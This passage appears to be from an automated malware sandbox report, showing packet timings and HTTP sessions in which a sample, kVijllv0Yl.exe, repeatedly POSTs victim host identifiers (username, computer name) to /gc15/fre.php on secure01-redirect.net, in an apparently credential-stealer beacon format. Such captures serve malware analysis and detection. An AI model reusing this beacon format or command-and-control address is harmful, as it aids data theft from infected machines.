                Jan 28, 2022 23:38:31.168302059 CET8049851185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:32.352724075 CET8049851185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:32.352835894 CET4985180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:32.352870941 CET4985180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:32.409070015 CET8049851185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:33.437607050 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:33.504811049 CET8049852185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:33.505017042 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:33.510654926 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:33.577811956 CET8049852185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:33.577954054 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:33.644937992 CET8049852185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:35.007775068 CET8049852185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:35.009013891 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:35.009049892 CET4985280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:35.076307058 CET8049852185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:37.063133955 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:37.131289005 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:37.131382942 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:37.134931087 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:37.202766895 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:37.202991009 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:37.270447969 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:38.454946995 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:38.455079079 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:38.455202103 CET4985480192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:38.522505045 CET8049854185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.063682079 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.130693913 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.130824089 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.133790970 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.200942039 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:40.201057911 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:40.269145012 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:41.392921925 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:41.393049955 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:41.393270016 CET4985580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:41.460256100 CET8049855185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.371988058 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.441322088 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.441457987 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.445022106 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.514486074 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:42.514592886 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:42.583889961 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:43.841937065 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:43.843163967 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:43.843206882 CET4986280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:43.913798094 CET8049862185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:45.453150988 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:45.509287119 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:45.517376900 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.720808029 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.776935101 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:46.777277946 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:46.833422899 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:48.177226067 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:48.179321051 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:48.179387093 CET4987080192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:48.244923115 CET8049870185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.391843081 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.448906898 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.449040890 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.452650070 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.508794069 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:49.508902073 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:49.565010071 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:50.674108982 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:50.674257994 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:50.674331903 CET4988180192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:50.730500937 CET8049881185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.243490934 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.310883045 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.312560081 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.315956116 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.383136988 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:52.383330107 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:52.450537920 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:53.689454079 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:53.689598083 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:53.689642906 CET4988280192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:53.756779909 CET8049882185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.728399038 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.794935942 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.795932055 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.799525976 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.866142988 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:54.866242886 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:54.932748079 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:56.145380974 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:56.145605087 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:56.145793915 CET4988380192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:56.212276936 CET8049883185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.184376001 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.251727104 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.251866102 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.255335093 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.322743893 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:57.322833061 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:57.390343904 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:58.636996984 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:38:58.637293100 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:58.637939930 CET4988580192.168.2.6185.185.69.76
                Jan 28, 2022 23:38:58.705543041 CET8049885185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.067264080 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.134578943 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.134684086 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.138022900 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.206916094 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:00.207024097 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:00.276201010 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:01.668778896 CET8049886185.185.69.76192.168.2.6
                Jan 28, 2022 23:39:01.668884039 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:01.668965101 CET4988680192.168.2.6185.185.69.76
                Jan 28, 2022 23:39:01.736831903 CET8049886185.185.69.76192.168.2.6
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                • secure01-redirect.net
                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.6 | 49769 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:07.260369062 CET | 1240 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 196
                Connection: close
                Jan 28, 2022 23:37:07.318934917 CET | 1240 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: 'ckav.ruengineer258555DESKTOP-716T771k08F9C4E9C79A3B52B3F739430dviSD
                Jan 28, 2022 23:37:08.647847891 CET | 1240 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:49 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.6 | 49770 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:10.277966022 CET | 1241 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 196
                Connection: close
                Jan 28, 2022 23:37:10.334817886 CET | 1241 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: 'ckav.ruengineer258555DESKTOP-716T771+08F9C4E9C79A3B52B3F7394302mSUK
                Jan 28, 2022 23:37:12.345729113 CET | 1242 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:52 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 15
                Content-Type: text/html; charset=UTF-8
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                10 | 192.168.2.6 | 49783 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:39.408766985 CET | 1383 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:39.466222048 CET | 1383 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:40.689152956 CET | 1384 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:21 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                11 | 192.168.2.6 | 49784 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:41.973819971 CET | 1384 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:42.042471886 CET | 1385 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:43.403239012 CET | 1385 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:23 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                12 | 192.168.2.6 | 49787 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:44.786353111 CET | 1397 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:44.854403019 CET | 1397 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:46.235904932 CET | 1468 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:26 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                13 | 192.168.2.6 | 49793 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:51.111628056 CET | 1514 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:51.168366909 CET | 1514 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:52.495630026 CET | 1514 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:32 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                14 | 192.168.2.6 | 49795 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:55.089534044 CET | 1516 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:55.158164978 CET | 1520 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:56.498845100 CET | 1537 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:36 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                15 | 192.168.2.6 | 49797 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:59.460407019 CET | 1545 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:59.528026104 CET | 1545 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:00.863837957 CET | 1545 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:41 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                16 | 192.168.2.6 | 49802 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:02.169111967 CET | 3128 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:02.235896111 CET | 4307 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:03.551551104 CET | 10282 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:44 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                17 | 192.168.2.6 | 49818 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:06.424436092 CET | 10554 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:06.481630087 CET | 10561 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:07.849755049 CET | 10771 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:48 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                18 | 192.168.2.6 | 49830 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:10.077239037 CET | 10784 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:10.133827925 CET | 10786 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:11.381908894 CET | 12486 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:51 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                19 | 192.168.2.6 | 49840 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:12.712441921 CET | 12493 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:12.782733917 CET | 12493 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:14.111047983 CET | 12494 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:54 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                2 | 192.168.2.6 | 49771 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:14.709347010 CET | 1243 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:14.779185057 CET | 1244 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:16.117796898 CET | 1343 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:56 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                20 | 192.168.2.6 | 49841 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:38:17.281043053 CET | 12494 | OUT | POST /gc15/fre.php HTTP/1.0
